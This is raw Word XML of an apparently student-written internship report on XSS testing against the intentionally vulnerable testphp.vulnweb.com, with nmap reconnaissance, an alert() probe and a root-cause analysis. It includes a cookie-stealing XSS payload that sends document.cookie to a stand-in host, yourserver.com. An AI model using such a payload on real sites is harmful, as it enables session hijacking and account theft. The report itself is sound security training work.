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5A1AC" w14:textId="77777777" w:rsidR="00327AED" w:rsidRDefault="008F35A2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487512064" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="257BB003" wp14:editId="151C1D16">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15C8166F" w14:textId="77777777" w:rsidR="00327AED" w:rsidRDefault="00327AED">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="381156B9" w14:textId="77777777" w:rsidR="00327AED" w:rsidRDefault="00327AED">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C38CC1B" w14:textId="77777777" w:rsidR="00327AED" w:rsidRDefault="00327AED">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79FAD390" w14:textId="77777777" w:rsidR="00327AED" w:rsidRDefault="00327AED">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26933E84" w14:textId="77777777" w:rsidR="00327AED" w:rsidRDefault="00327AED">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="100"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79D20386" w14:textId="77777777" w:rsidR="00327AED" w:rsidRDefault="008F35A2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:w w:val="90"/>
        </w:rPr>
        <w:t>Week</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="90"/>
        </w:rPr>
        <w:t>1:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:w w:val="90"/>
        </w:rPr>
        <w:t>Learning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="9"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:w w:val="90"/>
        </w:rPr>
        <w:t>Tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DE2704" w14:textId="77777777" w:rsidR="00327AED" w:rsidRDefault="00327AED">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D8B7754" w14:textId="77777777" w:rsidR="00327AED" w:rsidRDefault="008F35A2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="55"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487587840" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="72949F18" wp14:editId="4AA84E35">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1130300</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>203782</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5689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6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625297A" id="Graphic 2" o:spid="_x0000_s1026" style="position:absolute;margin-left:89pt;margin-top:16.05pt;width:44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" path="m,l5689600,e" filled="f" strokecolor="#878787" strokeweight="1pt">
                <v:path arrowok="t"/>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6DB82A" w14:textId="77777777" w:rsidR="00327AED" w:rsidRDefault="00327AED">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="135"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4598F4F8" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Week 1 Task Report - [ReferenceID]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FAA16B" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050F38C0" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t xml:space="preserve">This report outlines the findings and actions taken during Week 1 of the Web Application Security internship, focusing on identifying and exploiting Cross-Site Scripting (XSS) vulnerabilities in the target application </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00845E12">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>testphp.vulnweb.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00845E12">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3400DE0A" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Initial Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2052F9A1" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nmap Scan Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3F60B8" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>An Nmap scan was conducted to identify open ports and services running on the target application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6E3468" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Command Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADD5127" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677EF0B3" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE4F153" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>nmap -sS -p- testphp.vulnweb.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690ABF03" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4EC954" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>Open Ports: 80 (HTTP), 443 (HTTPS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558E834A" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>Services: Apache HTTPD 2.4.18</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574F9DAD" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Identified Technologies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2460CFFD" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>Wappalyzer was used to determine the technologies and frameworks utilized by the application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3117E418" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Findings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C96359F" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>Web Server: Apache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29940ADA" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>Programming Language: PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F710ADD" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>Frameworks: jQuery, Bootstrap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6EFA23" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2583BC03" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03991561" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="407E9828" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="487512576" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="35CD3613" wp14:editId="1CA0432F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="page">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7772400" cy="10058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7772400" cy="10058400"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C61F80D" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="435121C0" w14:textId="53A00162" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Testing for XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A88ABE1" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tools Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08368426" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>OWASP ZAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E785C21" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>Burp Suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A732BEA" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Input Fields Tested</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F688641" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>Search bar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F321B6" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>Comment section</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05612281" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XSS Payloads Used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A756B1A" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>&lt;script&gt;alert('test');&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059AC626" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB06378" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>The payload executed successfully in the search bar, indicating a reflected XSS vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E4A6E6" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploiting the XSS Vulnerability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E370C9" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Controlled Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786AC7CD" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>A controlled exploit was performed to demonstrate the impact of the vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337FFC2F" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Payload Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFA6287" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A2AB82" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229A8B98" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>&lt;script&gt;document.write('&lt;img src="http://yourserver.com/cookie?c=' + document.cookie + '"&gt;');&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DEA193E" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D71CE4" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>Demonstrated the ability to steal cookies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7C279A" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>Potential for session hijacking and user impersonation.</w:t>
      </w:r>
      <w:r w:rsidRPr="00845E12">
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="503C34BD" wp14:editId="30C00A6E">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="1631975678" name="Rectangle 5" descr="Cookie Th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C8BA3" id="Rectangle 5" o:spid="_x0000_s1026" alt="Cookie The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081171" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Understanding the Security Issue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5591F55D" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7EDE67" w14:textId="77777777" w:rsidR="008F35A2" w:rsidRPr="00845E12" w:rsidRDefault="008F35A2" w:rsidP="008F35A2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00845E12">
        <w:t>The XSS vulnerability arises from improper input validation and output encoding in the search bar. The application renders user input directly without sanitizing or encoding it, allowing the execution of arbitrary scripts.</w:t>
      </w:r>
    </w:p>
